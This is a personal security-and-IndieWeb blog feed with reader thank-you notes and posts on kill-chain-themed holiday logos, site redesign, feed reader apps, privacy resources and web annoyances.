Hi Michael! I stumbled upon your blog and realized that you did some research on threat modelling. I’m also interested in the field (currently working on a (yet) another methodology), so I would love to connect with you and share ideas on this and other Cyber Security topics. Kind Regards, Miguel.

From AJ (1/7/24)

Hi Mike, thanks for connecting. I came across your 2019 article and wanted to thank for putting it together. https://shellsharks.com/getting-into-information-security Happy New year!

From John W. (12/11/23)

Good morning Michael, found out about you through Reddit! I found your website site quite awesome and inspiring! I wanted to connect with you and seek out some mentorship as prepare to pivot careers!

From Samir A. (11/6/23)

Hi Michael, I found your website via Reddit, awesome content. … how did you create your website? Mine is not posted yet… (HTML/CSS/JS)

From Brei W. (11/14/23)

Good afternoon, I randomly ran across your website “shellsharks.com” from a reddit post. I am currently a cyber security student in VA and I was wondering if there is any advice you could give me as I close in on my undergraduate career.

From Clint G. (10/16/23)

Hey! I enjoyed your list of “designer vulnerabilities,” thanks for sharing. Cheers!

From Matt W. (10/13/23)

Hey man, I’m sure you get this alot, but still wanted to pass along my appreciation for the effort you put in that VM boot camp. Very helpful!

From Brian B. (9/3/23)

Hey Michael, I couldn’t send a message without connecting (LinkedIn restriction I guess?). I stumbled across shellsharks a few days ago and was really impressed with the level of effort you have put into the content and design. The nostalgia of indie-blogging is real. Nice work and all the best. - Brian

From Mehdi B. (9/18/23)

Dear Michael, I hope you are doing well, I found your profile by passing trough your blog post on threat modeling. First I want to thank you from the bottom of my heart, It is clearly the best ressource of threat modeling on the net. I want also to ask you if as you stated on the post, you plan to provide an example of your ID3 way to do threat model? It could be really helpful for me as I am doing threat modeling in my daily basis. Also if you have anything that details more your ID3 methodoloy, for example a more detailled scheme than the one on your blog I would really be interested. Many thanks in advance, Mehdi

From Ayres N. (9/22/23)

Stumbled upon your post about a portfolio for cybersecurity on reddit. Like your work and look to learn from you further.

From Preston K. (10/3/23)

Hi Michael. I read your post at https://www.reddit.com/r/cybersecurity/comments/11emt8m/whats_a_day_in_the_life_of_an_application/ and followed it to your site. I’m looking to make a move to appsec engineering and I’m training myself up at the moment. Just wanted to connect and say hi.

From Felicia G. (8/22/23)

I recently came across your portfolio, shellsharks.com after Googling ‘cybersecurity portfolios.’ Yours looks good. Let’s keep in touch!

From Laorenz M. (7/26/23)

I stumbled upon your website when I was looking for cybersecurity portfolios. I just started my CS journey and I got a lot more motivated thanks to you! You’re awesome!

From Seth C. (7/12/23)

Thank you for accepting my connection request! I’ve been reading through your “getting started in Infosec” article on your website - I really appreciate the collection of information! Thank you for your advice & making your collection of resources available!

From Diego Arteago (6/27/23)

I just spent a few hours binge reading shellsharks.com posts. Thanks for being a mentor!

From Nihil D. (6/25/23)

Hey man I saw your 5 year infosec blog get posted on reddit https://www.reddit.com/r/GIAC/comments/14ikgy5/need_some_help_with_sans_courses/ and enjoyed your blog. I am originally from the NoVA area and am trying to go there after my stint in the USAF is done next year.

From Tyler W. (6/6/23)

Found you through your threat modeling guide on your website. You’re a badass, my man.

From Sohail E. (2/21/23)

Thanks a ton for connecting with me. I just wanted to drop a quick note to say how excited I am to know that you’ve your own podcast! I just realized this now. I can’t wait to give it a listen and hear all the amazing things you’re sharing.

From Todd M. (2/12/23)

I have been following your blog and Reddit posts for a while now. Keep up the great work! Your breaking into Infosec post and roadmap has been instrumental in helping me navigate my own career path. Thanks again.

From Mike C. (11/27/22)

…I was on a road trip home (through the DC area, ironically) when I came across a post you had made to Reddit that linked to your experience with JHU (very informative! Thank you!). I’ve been looking through Shellsharks all evening and found a link to your LinkedIn and figured, why not!

It’s a pleasure to have made a connection with you. Have a great evening!

From Robert V.(9/17/22)

Hey Michael! We spoke briefly last year when you shared some AppSec learning resources with me via email. I’m a big fan of your blog and would love to connect!

From Willie N. (10/11/22)

I found your blog recently while searching for Threat Modelling resources and was impressed with the content of your posts.

I would like to connect with you to follow any future content that you might release.

From Ilia A. (9/9/22)

Hi Mike, I’ve been reading over your InfoSec playbook. Great stuff, thanks for putting it together!

From Niklas J. (8/28/22)

Hi man,

I don’t know you, any you don’t know me. But I just want to let know that I really enjoy your blog, thanks and keep it up :)

From Robin L. (8/2/22)

Hi Michael, I posted regarding your “Enchiridion” and tagged you in the post, but your name keeps dropping off for some reason. Anyway I really like the piece and your website and hope we can connect. Did you have a classical education btw? Best regards, Robin

From Darrius R. (7/25/22)

Hey Michael, just wanted to reach out for a connection. I wanted to let you know that I am interested in vulnerability management and I was looking at your blog! It has some great stuff for anybody looking to get into the industry !

From John K. (4/3/22)

Dear Michael, Follow your articles on shellshark, all absolute gold. Look forward to connect and associate with you. And learn from your experience and knowledge. Rgds, John

From B J B. (1/29/22)

Just stumbled on your website via Reddit. One word……..AWESOME! I’m steering into the cyber arena and I’m freshly starting out. Please continue the quality work.

From Will B. (11/9/21)

Hi Michael, I’m a big fan of your blog. It would be my honor to have you in my network.

From Michael A. (11/5/21)

Hey Mike, I saw your website with you reviewing all the training you have been in, which SANS course would you say is your favorite? I’ve taken maybe 7 classes and most are hit or miss.

From Lee T. (7/7/21)

Just read your blog and great job on the content, I particularly like the section about the trainings and certifications to avoid, since I was looking at a few of the SANS courses to take next. However, the Wireless Pentesting course in your write up sounds awesome. Great work on the blog!

From Cameron S. (6/4/21)

Nice website by the way. Just took a look at it. Sick desk setup haha

Shellsharks Doodles

Tue, 18 Feb 2025 00:29:00 -0500

Similar to the Google Doodles, my site has its Shellsharks Doodles. They are celebrations of various events and holidays throughout the year, each designed by me using the Assembly app. Some of the doodles are merely thematic additions to the plain shellsharks logo, while others completely re-visualize the symbology throughout. These doodles go up and replace the classic doodle at the appropriate times throughout the year.

Why did I design these? Just for fun I guess. Why these particular events/holidays? Well, I did what I could with the limited icon sets that were available within the Assembly app at the time. Will I make more doodles? I hadn’t thought about it for a while, but I can definitely see myself doing more in the future.

The classic logo. Read more about it here.

The New Years logo, basically the same as the classic logo, but with lotsa fireworks, some bottles poppin', a sign with the new year on it, and some fancy sharks with bowties. 🦈 ⋈ 😄.

The Valentines Day logo is also just the classic logo with a bunch of hearts and flowers added in various places. There are some "easter eggs" and li'l bonus things though. The weaponization circle has a "love potion" in the middle. For some reason I've put a planet that kinda looks like Venus (the roman goddess of love) in there (with the number '2' next to it as Venus is the second planet from the sun). I also pay homage to the classic ILOVEYOU virus in the exploitation and installation phases. Also looks like I changed the binary message around the outside of the logo, but honestly don't remember what it's supposed to say. A challenge for someone out there perhaps? 🧡

Here's a funny one, World Circus Day. Here things have gotten completely wacky, but you should appreciate that each of the inner circles still attempt to symbolize The Cyber Kill Chain. You've gotta use your imagination of course, but I'm sure you can kinda see what I was goin' for across each of the kill-chain steps. Notably we've got a cannon as the delivery mechanism and a "magician" pulling a rabbit out of a "hat" as the exploitation phase. There's also a Golden Ticket - wanna guess what that might be referencing? Everything else is, as you can plainly see, very circus-ey. Oh, and I've got swingin' monkey in there for good measure. 🎪 🙈

The Earth Day logo is a favorite of mine. It's again, just the classic logo, but with a lot of earth-ey stuff all over the place. Plants just growin' out from everything. My favorite part of this logo has got to be the great tree growing on the outside of the logo itself. 🌎

The Columbus Day logo is honestly one I haven't really used, but technically have around. Given the general controversy surrounding Columbus, and the holiday, it'll probably remain dormant. It's nothing but a few boats anyway.

The Halloween logo is another very intricate, thematic design. Each smaller circle on the interior of the logo has been re-made in a spooky fashion. We've got zombies screaming "BRAINS~!!!", witches flyin' every which way and plenty of ghouls and ghosties. But the best part? The scariest part? Is all the named vulns and their respective CVEs I've referenced in the exploitation and installation phases. Even better? Each of those named vulns are ones that have kinda spooky names too, e.g. "Cable Haunt", "ZombieLoad", "Stagefright", "Spectre", to name a few. There's a lot more in there too! Turns out vuln researchers like scary-sounding vuln names. 👻

Last, but certainly not least, is the Christmas doodle. It's easily the one I'm the most proud of. I think I really nailed the Christmas-to-Kill-Chain symbology throughout, following Santa's journey to put presents under your tree. 🎅 🎁 🎄

Reconnaissance: First, Santa performs recon, reviewing his famed Naughty & Nice list.
Weaponization: Only so much I can do visually with "exploitation", so here you get an assortment of random xmas-stuff and a particularly evil looking snowman.
Delivery: The sleigh is loaded, and 8 tiny reindeer are ready to mount to the sky! Rudolph has even made his appearance.
Exploitation: The chimney is Santa's favored exploitation vector.
Installation: The gifts are then "installed".
C2: A new reindeer appears - On HAXXEN!!
Actions on Objectives: Finally, Santa has delivered the presents, and he makes off with his favorite snack - a session-cookie!

Merry Haxmas to All and to All a Good Night!!

What's A Home Page?

Thu, 13 Feb 2025 09:03:00 -0500

Every website you go to has a home page, the page you land on when you go to that site’s root domain, i.e. for Shellsharks, when you go to “https://shellsharks.com”. Since 2021 my home page has had a very simple design - the logo, some link icons and the classic list of recent posts. In January of 2024 I simplified it even further, rearranging some graphics and removing the icons, filing them away in the site’s hamburger menu. More recently (~Februrary 2025), I got the itch to start tinkering with the site again and made a few further visual changes to the home page, opening up the feed to all content I write, not just posts, and adding some icons to differentiate the different content types.

But, it still just wasn’t what I was looking for. I knew I wanted something else, but wasn’t sure what that something else is. So I went looking for inspiration. I found that in two of my favorite sites, Cory Dransfeldt & Flamed Fury. Cory’s design has both a simplicity and cleanness to it, but also neatly showcases what he’s got goin’ on across the site. I really enjoy his use of color as well. fLaMEd has an incredible home page splash graphic and an amazingly curated collection of stuff, made available right there on the home page. So I took some of their ideas, and shellsharks-ified them, incorporating those ideas into what is (for now) my new home page, behold!

As I was building the new home page (and as I continue to do so), I’ve asked myself, “what is a home page?” What is it meant to do? What should it look like? What feeling do I want people to have when they go there? Where do I want them to go once they’re on my site? What do I want them to read? What’s important to me or to my readers? How do I want to use my site? The home page is a collection of opportunities and doors. My old home page was simple yes, and that was visually striking in a way that I’ve always enjoyed, but it didn’t tell you much, and what it did show you, was pretty limited - just a list of stuff I had published recently. There was no story, and it effectively hid a lot of the other things on my site that you, the reader, might be interested in, stuff I am proud of. So the idea behind the redesign was to surface these things, introduce you to my site, showcase what I’ve done recently and what I think you might want to see. I have a lot to offer, and have put in a lot of work, but only the real shellsharks spelunkers could have ever found it, digging around through the cavernous hamburger menu and web of hyperlinks throughout the site.

It’s a work in progress, my site always is, IndieWeb sites just tend to be. That’s what’s fun! What’s great about this particular modular design is that I’m able to add new things, showcase more stuff when I feel like it. One big downside to the classic design (circa 2021) was that I never featured anything but my formal “blog posts”. I talk about why I didn’t like that here. So I opened up the feed to everything, which introduced a new issue. Now, my best content was at risk of being buried in a way that I felt was a disservice. For example, I have a new Link Log where I share cool sites/blogs that I find, and I added those links to that home feed. But, I wasn’t incentivized to share a lot of links, because then my home page feed would’ve been overrun with just links to other people’s stuff (cool as that stuff may be), effectively watering down my site to a degree and de-emphasizing all the other stuff on my site. The new design allows me to share as many links as I want, without overshadowing everything else. Awesome!

So yeah, the new home page is live, and I think it’s great. I’d love to hear about your home page, or home pages of sites that you love (so I can get more inspo), or thoughts that you have about my new home page, hit me up anytime!

(Also, I’ve kept my classic home page available as the “home feed”.)

Tapestry Has Found its Place

Mon, 10 Feb 2025 14:56:00 -0500

A few days ago I confidently stated that “unified timelines are not for me”, but I think I may have been a bit too hasty in that declaration. I’ve been tinkering around with Tapestry for a few days now, trying to find a way to fit it into my daily feed ingestion workflow and I think I’m starting to discover its niche for me. This doesn’t really change what I said in that previous post, Tapestry is not a good (main) RSS reader, especially (again) when you weave together RSS feeds and social timelines (for the reasons I state in the article). Secondarily, Tapestry isn’t a great RSS reader (right now) as it struggles mightily when faced with simultaneously updating 100’s of disparate feeds, which my current RSS app (Reeder) does without breaking a sweat. In time, that performance issue may improve, but the former issue won’t. But let’s not dwell on what I don’t use Tapestry for, let’s instead talk about what I think it can be good at, and what I’ve started using it for over the past couple days.

I spent a long while yammering on about signal-to-noise ratio and fidelity as it relates to my “feeds” last time I wrote about unified timelines. There, I made the case for why mushing together my RSS feeds with (as an example) a social feed didn’t make sense, and I stand by that. I want to keep my RSS feeds in an RSS app, because they are the “highest-fidelity” feed and shouldn’t be paired with mid or low-fidelity-type feeds. Similarly. my Mastodon/Fediverse feeds need to be kept in their own app. But what about everything else? Here’s where Tapestry has found it’s niche for me.

You see when it comes to RSS, I scroll through & consider every post in that feed. It is highly curated afterall and there’s a decent likelihood im interested in anything/everything that shows up there. For my Fedi feeds, they are also highly curated, but more prone to … let’s call it “silliness”, so I tend to scroll a bit faster through that feed and don’t necessarily stop to really read and consider each post. After that what is there? There are a collection of “feeds” that I will, only look at occasionally, are high volume / low signal-to-noise, or are *“discovery-oriented”, in which I mean things I peruse to discover new stuff that might be of interest to me. This is the third degree of fidelity, and for those odd collection of feeds, Tapestry is actually quite a nice vehicle to consume them.

Feed Fidelity Continuum

Tier 1: RSS
Tier 2: Mastodon / Fediverse (non-algorithmic social feeds)
Tier 3: Other (e.g. Bluesky, Reddit, Discovery RSS*, Lemmy/Thrediverse, etc…)

Let’s talk about what makes Tapestry a great reader/timeline app for these ‘low-fidelity’ (Tier 3) feeds.

First, (before talking about the things Tapestry is great at) I want to reiterate that in my usage of Tapestry, it really struggled to import and then consistently refresh a large volume of RSS feeds. At first, I tried to import close to 2500 feeds into Tapestry and it simply would not do it. After that, I pared down the list and finally got about 500 feeds imported. The app would skitter and completely time out trying to refresh all those feeds. Contrast that with my Reeder app, purpose-built for RSS, which can ingest and handle 1000’s of feeds with no issue. So, if you have a high volume of RSS feeds, Tapesty isn’t for you right now, especially as a pure RSS app (not considering the issues I talked about before in terms of unifying RSS and other types of feeds.)

For social feeds, especially those that you want to actually engage with, Tapestry also isn’t ideal, as you completely lose all those capabilities to natively like/heart, reply, boost/repost, etc… You need to bounce out of the Tapestry app into the respective app/client for that social platform to do those things. But! What if you had a social feed that you wanted to follow, but wasn’t something you engaged with frequently. Then, Tapestry might work pretty well for that. This is the case for me with Bluesky. I have a Bluesky account, and I follow some folks there that do not have presences elsewhere. Because I want to see what they have to say, and I want to limit the amount of time I spend “engaging” there, Tapestry is a great place for me to mostly-read-only-mode my Bluesky feed. On the rare occasion I see something I really want to interact with on Bluesky, it’s easy enough to bounce out and do that. This is equally true for pretty much all the feeds I have loaded into Tapestry, it is entirely made up of things that I might want to quickly peruse, but probably won’t want to engage with.

Scrolling through gobs of stuff that might include something I’m interested in can be, at times, not the most enjoyable or worthwile scroll. But, Tapestry softens the blow because the app is gorgeous.

Looking back at my fidelity tiers, you’ve got RSS at 1, Fedi at 2, and everything else at 3. From a client perspective, this makes tier 1 and tier 2 pretty simple/obvious. You have an RSS app for 1 and a Fedi client (that supports more than just Mastodon) for 2. But for the third tier, “Other”, you need something that can natively ingest a wide variety of feeds, some of which may be kinda niche. Tapestry is not only built to do this out-of-the-box (as it is a unified timeline app), but it also ships with a powerful, extendable, connectors system by which you can load in (or develop your own) third-party connectors. This will make browsing feeds from all over the place uniquely possible.

In this story, Tapestry is being used to ingest, weave-together and view a wide variety of eclectic feeds, all of which are “lower signal-to-noise”. This could mean the timeline balloons beyond what you may feel like scrolling through on any given day. To help handle the firehose, Tapestry also ships with a powerful set of features for muffling, muting and building custom timelines.

So, that’s how I’ve been using Tapestry. It looks great, performs well for what I am now using it for and has even earned a coveted spot on my phone home screen. I’ve also seen a number of connectors being shared by the community too to further extend its capabilities which is awesome! Let me know what you think though! Especially for those of you who agreed with my original assessment. Do you think Tapestry (or other unified timeline apps) could have a place in your workflow? Or are you a normal person and don’t feel the need to keep up with every feed that’s of even mild interest to you?

What To Add To Your Site First

Thu, 06 Feb 2025 20:29:00 -0500

You got yourself a domain, you found a place to host your site, it’s up and running! Now what?

There’s A LOT you can do with a website. I mean you can pretty much do anything y’know? But here’s what I recommend you do first, before anything else.

Put some sort of contact information on your site, maybe even on your home page. This contact info could be an email, or a social media handle. It’s nice for people to be able to message you about your site!
Create an “About” page (preferably at https://YOURSITE/about). Here you can just briefly tell anyone who’s stumbled across your site who you are, and what the site is for. Easy!
For participating, or opting out of, broader web stuff, you might want to create a sitemap and/or a robots.txt file. The sitemap helps inform search engine crawlers what on your site you want indexed. Conversely, you’ll want the robots.txt file to instruct those same crawlers what pages they should avoid.
Though it isn’t required, I would suggest creating a “blog” too, where you can publish stuff you want to write about/share with any current/future readership. If you do decide to blog, be sure to also create an RSS feed so that people can subscribe to your content!
As a bonus, I would lastly suggest having some sort of search capability natively on your site. Search engines are becoming ever-more unreliable, so having a way to natively find things you’ve said/posted in the past is super useful!

Other stuff you can do with your site

Unified Timelines Are Not For Me

Thu, 06 Feb 2025 12:19:00 -0500

Several unified, social-web-forward, chronological timeline apps have popped up recently. Notably Reeder (not to be confused with Reeder Classic), Tapestry & Surf. Though these apps differ in many ways, they have these core commonalities…

They support mixed-content/heterogenous feeds (e.g. podcasts, YouTube, Mastodon, Pixelfed, Bluesky, Glass, Flickr, Reddit, RSS, Tumblr and more)
All feeds are woven together in a unified, chronological timeline with some form of timeline sync rather than unread counts typical of your classic RSS feed readers
They also support the ability to create custom feeds, timelines and filters

Cool right? This sounds useful. I can reduce the amount of apps I’m opening all the time and do a better job not missing things, yeah? In theory. But in practice, I have found that these apps, cool as they are, just don’t give me what I want and need. Let me explain why…

Curation & completionism: RSS feeds are highly curated and high fidelity/signal-to-noise. What I mean by that, is you subscribe to what you want, and you get nothing else. I also think that generally, people’s list of RSS feeds is smaller and more highly curated than their social media follows (as an example). Non-algorithmic social feeds (i.e. Mastodon / Fediverse platforms) are still (generally) highly curated (at least for me), but lower signal-to-noise courtesy of the nature of social media/micro-blogging. You get a lot more casual posts, short-form stuff, shitposts, and of course boosts/reposts, all of which add more noise to the feed. This means that when juxtaposed in a unified timeline, you lose the fidelity of your RSS feeds, by combining it with the higher noise feed of your social media timeline. You continue to lose fidelity as you add even noisier feeds (i.e. Reddit, Tumblr, or algorithmic timelines).

Social functionality: When you scroll a social feed, there are a lot of little interactions you may want to perform. Namely “stars” and “boosts” (to use the Mastodon lexicon). In order to do those things while browsing a unified feed app however, you would have to jump out of the unified timeline/app into the respective app, which adds a lot of overhead, especially if you’re someone like me who tends to like/repost a lot of stuff. You may also want to follow an account, mute something, search for something in-app, add something to a list, etc… There’s lots of functionality you just lose by not being in the app that supports the actual service you’re browsing.

Volumetric imbalance: I touched on this earlier. Let’s say you don’t open your RSS app for a day, depending on how many feeds you have subscribed to, you’ll get maybe 10’s of new items. In a social media app though? Hundreds. When combined in a unified timeline, blog posts, which again are meant to be kinda higher signal, are drowned in a sea of microblog shitposts. Similar story with something like Reddit.

Mindset: Do you really want to browse Reddit threads at the same time you’re catching up on the blogs you subscribe to? Do you want to scroll through people’s social media shitposts at the same time you’re seeing what new podcasts there are? This is of course very subjective, but there’s something to it. I think I just tend to be a in mood for a particular type of content, and by mushing them all together, it’s a bit of a rollercoaster.

Now these unified timeline apps do have the ability to switch your feed/custom timeline view, but how does that then work with the timeline sync? If I switch from the unified view to just scroll through my latest YouTube items, what happens when I re-enable the unified timeline at a point in time further back then I had made it in my filtered YT timeline? Are those repopulated in the universal timeline and I have to scroll past them again? Are they intelligently filtered out? It gets a bit complicated.

Native functionality: In a unified timeline app, you just lose out on native functionality of the client or the overall platform. For Mastodon, you can’t like, boost, or comment. For Bluesky, you can’t leverage the algorithmic feed or see notifications. For Reddit, you can’t browse other non-subscribed subreddits, look at messages, etc… You get a watered down experience of all these services.

This said, one way to use a unified timeline app in partnership with a native client would be to scroll through the unified timeline, save/bookmark things you want to interact with, and then go through your saves and systematically interact as you had wanted, and then unsave/unbookmark as you complete each interaction. This could probably work for me, but the problem remains that I just tend to scroll faster through a social feed than I would my blog feed. This goes back to the curation/signal problem. How much do you care about each individual feed. You’re probably perfectly willing to miss something in a Reddit sub, but less willing to miss something in your RSS feed or even Mastodon/Fediverse feed.

Another way I suppose I could use an app like this is to not used the unified timeline at all, but since all my feeds are supported in-app, I can just scroll each individual feed independently, yet all through the same app. But if I’m doing that, why not just jump into the apps themselves where I don’t lose functionality? Any time I save by staying in one app, I lose because I’ll likely need to jump out of the universal timeline app to interact with things in the respective native apps.

I really want to like these apps (In fact, I was a Project Tapestry Kickstarter supporter), and I think an app like Surf stands out because it not only has unified timeline stuff, but it has real powerful search and discovery functionality. Don’t get me wrong, these apps look great (Tapestry is BEAUTIFUL), but they just aren’t for me - not for the way I use and browse my feeds on a daily basis. To be fair it’s early days for these apps, and I suspect a lot of new functionality will be added over time. So I will keep my eye on them and continue trying them out as they evolve!

So I still encourage you to just get an RSS app, but hey, I’m interested in hearing your story about how this does work for ya. It might not be my cup of tea (yet), but that doesn’t mean it won’t be yours!

Other Stuff

Using Tapestry or Reeder as a Bluesky app is actually a pretty good idea since it gives you one really awesome feature that you can’t get with the native app - timeline position sync.

Surviving the Brave New World

Thu, 06 Feb 2025 08:19:00 -0500

The world is a dangerous place, and complexity abounds, moreso today it seems than it ever has been. Navigating a world filled with AI-fueled disinformation, corporate-backed algorithmic control, political information silos and worse is no easy feat. So how can we trust what we see? How can we communicate safely? How can we protect ourselves in a digital warzone? How can we build and sustain our communities? How can we do all of this in light of the powers that seek to isolate, confuse, depress and control us? Here are some resources for staying safe and surviving…

Like most things on my site, this is a "living resource". I will add and update this post as I discover new things.

This is a call for contributions! If you have tips, advice, additional resources that fit into these categories, I want to know about them so I can add it here.

Thanks, and stay safe out there!

News
Social Media
Self-Hosting
Communication
Privacy & OpSec
Community

News

Disinformation, misinformation, biased news, whatever. It’s everywhere. How can you know what you are reading is reality? Who speaks truth to power? Where can you go to get the actual news? We all know the traditional news outlets have capitulated, and the behemoth centralized platforms will suppress and annihilate news they deem unfit to the narrative. There’s no silver bullet here, but there are sources of light and truth you can plug into. Here’s some recommendations (none of these are foolproof sources, remember to fact check!)…

News Sources

ProPublica: An independent, nonprofit newsroom that produces investigative journalism with moral force.
404 Media: Journalist-founded digital media company exploring the ways technology is shaping–and is shaped by–our world.
Al Jazeera
AlterNet
Ars Technica
Associated Press
Democracy Now!
Lawfare
Mother Jones
Rolling Stone
SLATE
Teen Vogue
Texas Observer
The 19th News
The Atlantic
The Guardian
The New Republic
The Verge
Washington Monthly
Wired

and some resources for finding further news…

Trustworthy Media: Provides a list of independent media sources.
FindYourNews: A place to discover and connect with public service newsrooms.

*Have other news sources you recommend? Have concerns about one of the sources listed here? Please let me know!

Fact-Checking

Remember to find secondary sources to verify/corroborate any news/information you see online. Some fact-checking resources…(thanks AAKL!)

…and a few link checkers to ensure the links are free from malware, phishing, etc…

Don’t look for news on the big centralized social networks. They will censor things of import. Instead, find some trustworthy sources on decentralized social media outlets.

I’ll just say it. The centralized platforms are bad (for a lot of reasons I’ll cover). Facebook, Twitter (X), Instagram, TikTok, even Bluesky. That’s not to say they aren’t entertaining, or an easy way to communicate with friends & family, but they are bad for a lot of other reasons. Propagating disinformation, rampant censorship, heavy-handed moderation, shady ownership, privacy violations, enshittification, you name it. So what’s the solution? Is there a perfect social media utopia to run to? Of course not. But we do have something, something that is actually resilient in the face of ever-expanding oligarchic and governmental control. That something is the Fediverse - a real decentralized social media network.

But don’t just take it from me, take a look at the following stories on this topic.

Looking to further understand why the Fediverse is better? Read through these benefits. Mastodon is one of the more popular Fediverse-enabled platforms, I’ve got the following guide if you’re interested in learning more. Want to take it to the next level and own your own fediverse instance? Here’s some managed hosting providers to help you achieve that. Looking to go beyond micro-blogging? The “Threadiverse” is the Fediverse’s answer to Reddit being awful.

Self-Hosting

Our reliance on big tech is dangerous. Given their willingness to fold in the face of governmental pressure, by governments who might not have your best interests in mind, there is little assurance they will safeguard data you entrust to them, nor can we be certain that we won’t be deplatformed. So, we must learn to self-host the services that matter. It requires some know-how, some cash and in many cases some hardware, but it can be done!

Below are some self-hosting-related resources…

The Homelab Almanac
Run Your Own Mail Server
Though running your own mail server can be fraught –> After self-hosting my email for twenty-three years I have thrown in the towel. The oligopoly has won.
Host your stuff | 32x33 Institute
Introduction to a Self Managed Life: a 13 hour & 28 minute presentation by FUTO software
Proxmox VE Helper-Scripts
Awesome-Selfhosted
European alternatives for digital products

On a related note, here’s some thoughts/resources on archiving data.

Communication

We need to be able to communicate securely. Social media is not the place for this, not even decentralized social media. Signal is a highly-recommended option for secure commmunications.

Privacy, Digital Security & OpSec

Surveillance is everywhere, learn to protect your privacy. Some resources below…

Digital Threat Modeling Under Authoritarianism
Privacy Guides
The Opt Out Project
The Protesters’ Guide to Smartphone Security
On Anonymity
Here’s how to share sensitive leaks with the press
Infosec 101 for Activists
For those in the press, or looking to conduct any form of ‘jounalism’: Freedom of the Press Foundation
European Alternatives
“I Have Nothing to Hide: The Dangerous Myth About Privacy
No Trace Project: A collection of tools to help anarchists and other rebels understand the capabilities of their enemies, undermine surveillance efforts, and ultimately act without getting caught.
Never accept an MDM policy on your personal phone
Surveillance Self-Defense
Atlas of Surveillance
The comprehensive guide for online anonymity and OpSec
Awesome Privacy
Prism Break
The WIRED Guide to Protecting Yourself From Government Surveillance
Opsec and you: how to navigate having things to hide
This Universal Threat Model Will Help You Stay Safe Online
Encrypt it Already

Community

When you can’t rely on the government or corporations to protect and care for you, you must fallback on your community.

Support What Matters

While everything in the world seems to be enshittifying and fully capitulating, there are some standouts. Here are some services/organizations still worth supporting.

Wikipedia
Independent news outlets
Goods Unite Us: Search for a brand and see its politics.

Other Resources

Some other resources that may be useful in these times.

Web Page Annoyances

Wed, 05 Feb 2025 08:20:00 -0500

Came across this great post on rachelbythebay.com titled, Web page annoyances that I don't inflict on you here and it got me thinking, does my site avoid all these annoying things? Are there other annoying things that I encounter on the web that my site doesn’t do? Are there, *gulp*, things my site does that are annoying?

DISCLAIMER: I've stolen some of the things from Rachel's list and added them to my own. All credit to her for this amazing original rant though!

Annoying things my site doesn’t do

I don’t track engagement in any way. No click counter, no Google analytics, nada. Honestly, I’m just not interested in it. My site isn’t monetized, and I don’t want to obsess over what pieces do well or how many people clicked, or are subscribed, or w/e. I write because it’s fun and I enjoy engaging with those who message me about something I’ve written. Easy.

I don’t have ads of any kind. Again, I don’t monetize the site. My site is first and foremost a resource for myself. To junk it up with a bunch of ads would be counter to this mission. I’ll never have ads. That simple.

I don’t set cookies. So I have no GDPR-induced privacy pop-up you have to accept or any other cookie-related advisory notices. I actually value your privacy, and do so by not wanting to know anything about you. That is unless you want to reach out to me and chat! Then I’d love to get to know ya 😄.

I don’t track IPs. My site is hosted off GitHub Pages, and as such, I can’t even get this information. Even if I could though, I wouldn’t look at server logs because I just don’t care.

I don’t do popups. You won’t have to make any privacy concessions, nothing is going to pop up and ask you to give me money or subscribe, you can just scroll and click in peace.

I don’t abuse animations. I actually do have a few things animated within my site. There’s one page (I won’t tell you which), where the sharks in my footer will circle when you hover over them. I also have a small few indieweb-related sites that have some 88x31 oldweb-style buttons, some of which animate. Oh, and yeah, my title image has a blinking underscore, but that’s cool right?

I don’t have any autoplaying audio or video. Actually, don’t think I have any audio or video at all. Problem solved.

I don’t try to “grab you” when you back out of a page, saying something like “before you go, check out this other thing”. That’d be really annoying.

I don’t hide or otherwise not include publish dates for blogs. In fact, I have ‘published’ and ‘updated’ dates for all my content.

I don’t have elements which follow you down the page as you scroll.

I don’t have any content across pages which begs you to support me or follow me or subscribe or w/e.

I do no scroll-hijacking or tamper with how your browser has implemented scrolling. No silly “progress bar” which animates as you scroll up and down a page.

I don’t junk up my pages with icons that claim to be for “sharing” or “liking” a post.

I don’t do any dynamic page loading as you scroll down. I don’t have pages with infinite scroll. The page you wanted to see is what you see, nothing else. I have very reasonable pagination for my various post streams.

I don’t put vacuous and misleading clickbait “you may be interested in…” boxes at the bottom of my posts.

My site is not monetized, so I don’t make any money just because you go anywhere on my site.

I don’t have anything like that annoying Substack page that asks you to subscribe before redirecting you to the actual page you wanted to see.

I don’t not have a dark mode theme.

I don’t not have an RSS feed.

Nothing on my site will ask you to enable notifications in your browser, I don’t ask to send you notifications of any kind. My site doesn’t need your email.

I don’t ask for your location.

I don’t shift things on your screen annoyingly, causing you to mis-click links.

I don’t muddy my content pages with comments, or awful Disqus forums.

I don’t ask you to make an account of any kind.

I don’t have any paywalled or account-walled content.

I don’t optimize for SEO. Not saying I won’t try a fun, slightly click-baitey post title every once in a while, but it’s certainly not done to get better search rankings.

I don’t have gobs of third-party dependencies. What third-parties I do use I try to expose here.

I don’t have any janky photo carousels. In fact I keep photos sorta to a minimum on the site.

I don’t aggressively limit column width for content on large displays. If you got a beautiful, glorious, gigantic, wide-screen monitor and for some unearthly reason wanted to open my site in full-screen mode, you’ll have SUPER wide content to enjoy.

I don’t do relative dates for posts. It’s all about them absolute dates. No date math required!

I don’t have any huge banners or images on content pages. I have some larger graphics like my home page logo, but even that is relatively tame.

I don’t hide my contact information. Wanna find me on the web? It’s all pretty easy to find.

Annoying things I (unfortunately?) do

Some things I do on my site you might actually find kinda annoying. Sorry about that. I’d like to find a way to stop doing those things or mitigate them to an extent in the future…

I do kinda require JavaScript for the site to look normal. Technically you can read posts without JS…but some stuff will certainly be wonky. One day I’d like to look into how I can make my site play nicely for those with JS tunred off…

I do have all sorts of images without ALTs. In fact, I have a lot of accessibility stuff I desperately need to put time into fixing. Sorry!

I do load some things from other origins (Pictures, some scripts, etc…). You can read about those suppliers here.

What are some other annoying things websites do? Does my site do them? Feel free to let me know, I probably want to fix it, and have it not do that thing. Thanks!

No More -ishings!

Tue, 04 Feb 2025 22:23:00 -0500

*Takes a breath.*

STOP. Please. Just stop. No more. We as a community (the infosec community) must band together and collectively agree to stop creating new phishing name variants. It’s gone too far. There’s too many! Won’t someone think of the aspiring CISSPs? In addition to cramming fire suppression factoids and bollard types into their heads, they will also need to memorize every god forsaken -ishing term too. Back in my day you had just a few, e.g. phishing, vishing, spear phishing, whaling, blah blah - and this was still way too many. What’s with us infosec folks? Why do we do this to ourselves? (Theory: self-loathing, it actually explains a lot about infosec practitioners really). But it was the way it was, and I never complained.

